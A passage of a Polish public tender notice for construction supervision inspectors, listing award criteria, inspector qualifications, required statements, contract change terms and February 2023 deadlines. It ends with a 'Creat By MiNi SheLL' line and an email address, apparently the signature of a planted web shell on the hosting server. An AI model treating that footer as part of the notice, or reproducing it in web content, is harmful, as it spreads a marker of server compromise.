uzyskać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie inspektora branży elektrycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdz. VII SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>7.2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek udziału w postępowaniu w zakresie:<br/>7.2.1 Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie określa warunku.<br/>7.2.2 Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie określa warunku.<br/>7.2.3 Sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie określa warunku.<br/>7.2.4 Zdolności technicznej lub zawodowej.<br/>Warunek zdolności zawodowej zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej:	<br/>a) jedną osobą do pełnienia funkcji inspektora nadzoru posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi, bez ograniczeń, w specjalności konstrukcyjno – budowlanej lub posiadającą inne równoważne uprawnienia wydane na podstawie przepisów obowiązujących w dniu wydania uprawnień uprawniające do nadzorowania robót budowlanych w zakresie niezbędnym do realizacji przedmiotu zamówienia;<br/>b) jedna osobą do pełnienia funkcji inspektora nadzoru, posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi, bez ograniczeń, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub posiadającą inne równoważne uprawnienia wydane na podstawie przepisów obowiązujących w dniu wydania uprawnień uprawniające do nadzorowania robót budowlanych w zakresie niezbędnym do realizacji przedmiotu zamówienia; <br/>c) jedna osobą do pełnienia funkcji inspektora nadzoru, posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi, bez ograniczeń, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub posiadającą inne równoważne uprawnienia wydane na podstawie przepisów obowiązujących w dniu wydania uprawnień uprawniające do nadzorowania robót budowlanych w zakresie niezbędnym do realizacji przedmiotu zamówienia; <br/>d) jedną osobą do pełnienia funkcji inspektora nadzoru, posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi, bez ograniczeń, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych lub posiadającą inne równoważne uprawnienia wydane na podstawie przepisów obowiązujących w dniu wydania uprawnień uprawniające do nadzorowania robót budowlanych w zakresie niezbędnym do realizacji przedmiotu zamówienia;<br/><br/>Uwagi: <br/>1) Uprawnienia, o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2021 r. poz. 2351 ze zm.) lub ważne odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w zakresie objętym niniejszym zamówieniem. <br/>2) W przypadku Wykonawców zagranicznych, dopuszcza się również kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art.12 a ustawy Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2020, poz. 220). <br/>3) W przypadku osób będących obywatelami państw członkowskich UE, Konfederacji Szwajcarskiej lub państw członkowskich (EFTA)-stron umowy o Europejskim Obszarze Gospodarczym – prawo do wykonywania samodzielnych funkcji technicznych w budownictwie na terytorium RP winno być potwierdzone odpowiednią decyzją o uznaniu kwalifikacji zawodowych lub prawa do świadczenia usług transgranicznych. <br/>4) Dopuszcza się uprawnienia równoważne (w zakresie koniecznym do wykonania przedmiotu zamówienia) – dla osób, które posiadają uprawnienia uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. <br/>5) W przypadku wykazywania warunku określonego powyżej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, a także w przypadku polegania na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 Ustawy, Zamawiający dopuszcza łączne spełnianie warunku.<br/>6) Wyżej wymienione osoby pełnić będą funkcję inspektora nadzoru w zakresie robót w swojej specjalności. Zamawiający dopuszcza możliwość łączenia przez jedną osobę kilku w/w funkcji, pod warunkiem posiadania przez nią wymaganych uprawnień.<br/>Ocena spełniania tego warunku zostanie dokonana według formuły spełnia – nie spełnia.<br/>7.5.4. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności zawodowej dopuszcza łączne spełnianie warunku przez Wykonawców<br/>7.5.5. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, żaden z Wykonawców nie może podlegać wykluczeniu. <br/>7.6. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie<br/>Wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>8.5.1 Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej,<br/>w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym<br/>Wykonawca, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 7 do SWZ;<br/>8.5.3 oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu , o którym mowa w art. 125 ust 1. ustawy Pzp , w<br/>zakresie podstaw wykluczenia postępowania wskazanych przez Zamawiającego- zgodnie z załącznikiem 9 do SWZ;<br/>8.7 Zamawiający nie będzie wzywał do złożenia podmiotowych środków dowodowych, jeżeli można je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o<br/>informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wykazał w oświadczeniu o którym mowa w<br/>art. 125 ust 1 Pzp, dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>8.5.2 Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nieczynności oraz informacją o<br/>podstawie do dysponowania tymi osobami – warunki określone zostały w rozdziale VII pkt 7.2.4 SWZ; wzór wykazu osób stanowi załącznik nr 8 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca do oferty dołącza:<br/>8.1.1 oświadczenie o niepodleganiu wykluczeniu,<br/>8.1.2 oświadczenie o spełnieniu warunków udziału w postępowaniu,<br/>- w zakresie wskazanym przez Zamawiającego – wzór oświadczenia stanowi załącznik nr 3 do SWZ.<br/>8.2 Wykonawcy wspólnie ubiegających się o udzielenie zamówienia, oświadczenie o którym mowa w w/w pkt 8.1.1<br/>niniejszego rozdziału, składa każdy z Wykonawców – wzór oświadczenia nr 3 do SWZ.<br/>8.3 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 117 ust. 4 ustawy PZP<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie z którego wynika, które<br/>usługi wykonają poszczególni Wykonawcy – wzór oświadczenia stanowi załącznik nr 4 SWZ.<br/>8.4 Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z<br/>ofertą oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw do wykluczenia tego podmiotu<br/>udostępniającego zasoby, oraz odpowiednio wypełnienie warunków udziału w postępowaniu, w zakresie w jakim<br/>Wykonawca powołuje się na jego zasoby – wzór oświadczenia stanowi załącznik nr 5 do SWZ.<br/>2. Wykonawca ma prawo złożyć tylko jedną ofertę.<br/>3. Wykonawca składa ofertę sporządzoną na lub w oparciu o formularz oferty (załącznik nr 2 do SWZ) wraz z:<br/>1) Oświadczeniem o braku podstaw do wykluczenia i spełnieniu warunków udziału w postępowaniu – wzór oświadczenia<br/>stanowi załącznik nr 3 do SWZ<br/>2) Oświadczeniem z art. 117 ust. 4 (jeżeli dotyczy) – załącznik nr 4<br/>3) Oświadczeniem z art. 125 ust. 5 (jeżeli dotyczy) – załącznik nr 5<br/>4) Zobowiązaniem podmiotu udostępniającego swoje zasoby (jeżeli dotyczy) – załącznik nr 6<br/>5) Pełnomocnictwem (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.5 Wspólne ubieganie się o udzielenie zamówienia:<br/>7.5.1 Oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być podpisana w taki sposób, by<br/>prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>7.5.2 Zgodnie z art. 58 ust. 1 ustawy PZP Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim<br/>przypadku zgodnie z art. 58 ust. 2 ustawy PZP Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania ich i zawarcia umowy w sprawie zamówienia publicznego.<br/>7.5.3 Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie.<br/>7.5.4. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do<br/>warunku dotyczącego zdolności zawodowej dopuszcza łączne spełnianie warunku przez Wykonawców<br/>7.5.5. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, żaden z Wykonawców nie może<br/>podlegać wykluczeniu.<br/>7.6. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>8.2 Wykonawcy wspólnie ubiegających się o udzielenie zamówienia, oświadczenie o którym mowa w w/w pkt 8.1.1<br/>niniejszego rozdziału, składa każdy z Wykonawców – wzór oświadczenia nr 3 do SWZ.<br/>8.3 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 117 ust. 4 ustawy PZP<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie z którego wynika, które<br/>usługi wykonają poszczególni Wykonawcy – wzór oświadczenia stanowi załącznik nr 4 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Ze względu na ograniczoną ilość znaków w ogłoszeniu (4 tys.) pełen katalog zmian, oraz okoliczności i zasady ich wprowadzenia zostały opisane w rozdziale VI SWZ oraz załączniku nr 1 do SWZ<br/>3. Dopuszczalna jest zmiana przedmiotu zamówienia poprzez zmianę zakresu nadzorowanych robót budowlanych przewidzianych w dokumentacji postępowania o udzielenie zamówienia na nadzorowane roboty budowlane<br/>6. Dopuszczalna jest zmiana terminu wykonania umowy w przypadku wydłużenia terminu realizacji nadzorowanych robót budowlanych lub w przypadkach określonych w SWZ oraz załączniku nr 1 do SWZ<br/>8. Dopuszczalna jest zmiana osób skierowanych do realizacji zamówienia w odniesieniu do osób wskazanych przez Wykonawcę na etapie postępowania o udzielenie zamówienia publicznego, jeżeli osoby te spełnią określone w<br/>dokumentach zamówienia warunki udziału w postępowaniu; w przypadku zmiany osoby mającej pełnić funkcję inspektora nadzoru branży elektrycznej, proponowana osoba musi posiadać doświadczenie nie mniejsze niż osoba wskazana pierwotnie w ofercie wskazane w ofercie (w zakresie za który oferta uzyskała punkty).<br/>9. Dopuszczalna jest również zmiana podwykonawcy, na którego zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej polegał Wykonawca ubiegając się o zawarcie Umowy, w sytuacji gdy nie dysponuje już zasobami wskazanego w ofercie podmiotu – jeżeli wykaże on, że zastępujący podmiot spełnia określone w dokumentach zamówienia warunki udziału w postępowaniu.<br/>10. Dopuszcza się zastąpienie Wykonawcy nowym Wykonawcą (art. 455 ust. 1 pkt 2 lit. b ustawy pzp), jeżeli nowy Wykonawca jest następcą prawnym Wykonawcy lub przejął zobowiązania Wykonawcy związane z wykonaniem przedmiotu umowy lub odpowiada osobiście lub majątkowo za wykonanie umowy.<br/>11. W przypadku stwierdzenia okoliczności związanych z wystąpieniem choroby zakaźnej, które uniemożliwiają bądź w istotnym stopniu ograniczają możliwość należytego wykonania umowy, Zamawiający dopuszcza możliwość zmiany postanowień niniejszej umowy w zakresie terminu jej wykonania, sposobu wykonania przedmiotu umowy, zakresu świadczenia Wykonawcy lub sposobu rozliczenia wynagrodzenia Wykonawcy.<br/>12 Zmiana wynagrodzenia na podstawie art. 436 pkt. 4 lit. b ustawy pzp;<br/>14. Dopuszczalna jest zmiana wynagrodzenia Wykonawcy netto wynikająca z zaokrągleń należnego podatku VAT na poszczególnych fakturach; wartość brutto umowy pozostaje bez zmian.<br/>15. Dopuszczalna jest zmiana limitu % dla poszczególnych faktur polegająca na możliwości kumulacji limitu % w przypadku początkowego niższego niż przewidziany limit zaawansowania robót lub w przypadku gdyby zachowanie przewidzianych limitów uniemożliwiłoby pełne rozliczenie umowy, przy zachowaniu limitów finansowych przewidzianych w umowie w danym roku kalendarzowym lub uprzedzeniu Zamawiającego przez Wykonawcę, o konieczności zmiany limitu płatności w danym roku (pod warunkiem że zmiana taka będzie możliwa pod względem budżetowym).<br/>16. Dopuszczalna jest zmiana zakresu prac zleconych podwykonawcom w stosunku do zakresu wskazanego w ofercie. Zmiana warunkowana zgodą zamawiającego.<br/>20. Zmiana wynagrodzenia na podstawie art. 439 ustawy pzp szczegóły opisane zostały w rozdziale VI SWZ oraz załączniku nr 1 do SWZ<br/>21. Podstawą do stosownych zmian w umowie, o których mowa w niniejszym paragrafie będzie pisemny wniosek<br/>Wykonawcy wraz z powołaniem okoliczności uzasadniającej zmianę umowy oraz szczegółowym odniesieniem tej okoliczności do obowiązków Wykonawcy wynikających z niniejszej umowy oraz dowodami na okoliczności wskazane przez Wykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć na Platformie pod adresem: https://gminauniejow.ezamawiajacy.pl w zakładce „OFERTY&#34; do dnia 02.02.2023 r. do godz. 10.00</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-02 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 3. Kryterium „Doświadczenie ” (D) będzie oceniane według następujących zasad:<br/>1) brak doświadczenia zawodowego Inspektora Nadzoru w branży elektrycznej polegającego na pełnieniu funkcji kierownika budowy lub inspektora nadzoru branży elektrycznej na minimum 1 zadaniu polegającym na robotach budowlanych związanych z wykonaniem systemu zarządzania budynkiem BMS dla budynku o kubaturze co najmniej 3000m3 – 0 pkt<br/>2) doświadczenie zawodowe Inspektora Nadzoru w branży elektrycznej polegające na pełnieniu funkcji kierownika budowy lub inspektora nadzoru branży elektrycznej na minimum 1 zadaniu polegającym na robotach budowlanych związanych z wykonaniem systemu zarządzania budynkiem BMS dla budynku o kubaturze co najmniej 3000m3 – 20 pkt<br/>3) doświadczenie zawodowe Inspektora Nadzoru w branży elektrycznej polegające na pełnieniu funkcji kierownika budowy lub inspektora nadzoru branży elektrycznej na 2 lub więcej zadaniach polegających na robotach budowlanych związanych z wykonaniem systemu zarządzania budynkiem BMS dla budynku o kubaturze co najmniej 3000m3 – 40 pkt<br/>W przypadku niewypełnienia lub błędnie wypełnionego przez wykonawcę w formularzu ofertowym kryterium „Doświadczenie” Zamawiający przyzna 0 punktów w tym kryterium, a jako deklaracja braku poświadczenia inspektora nadzoru branży elektrycznej na zadaniu polegających na robotach budowlanych związanych z wykonaniem systemu zarządzania budynkiem BMS dla budynku o kubaturze co najmniej 3000m3.<br/>Przedmiot zamówienia nie został podzielony na części. Zamawiający nie dopuszcza składania ofert częściowych.<br/>Kompleksowa realizacja zamówienia wynika z charakteru zamówienia. Podział zamówienia na części mógłby w sposób istotny zagrozić terminowemu oraz właściwemu jakościowo wykonaniu zamówienia z uwagi na brak możliwości dokładnego i zgodnego w czasie skoordynowania współpracy kilku wykonawców. Realizacja zamówienia przy zaangażowaniu wielu wykonawców, prowadzi do nadmiernych problemów logistycznych i organizacyjnych. Dodatkowo rozprasza się kwestia odpowiedzialności za jakość wykonanych usług.<br/>Nadzór będzie świadczony w okresie od dnia podpisania umowy w sprawie pełnienia nadzoru inwestorskiego do zakończenia inwestycji, przez które rozumie się dokonanie przez Zamawiającego odbioru końcowego zadania inwestycyjnego. Przewidywany termin zakończenia robót: do 15.06.2023 r.; w przypadku zmiany przewidywanego terminu zakończenia inwestycji nadzór będzie świadczony do zmienionego terminu zakończenia inwestycji. Za termin wykonania przedmiotu umowy przyjmuje się dzień podpisania protokołu odbioru końcowego zadania – robót budowlanych.

Creat By MiNi SheLL
Email: jattceo@gmail.com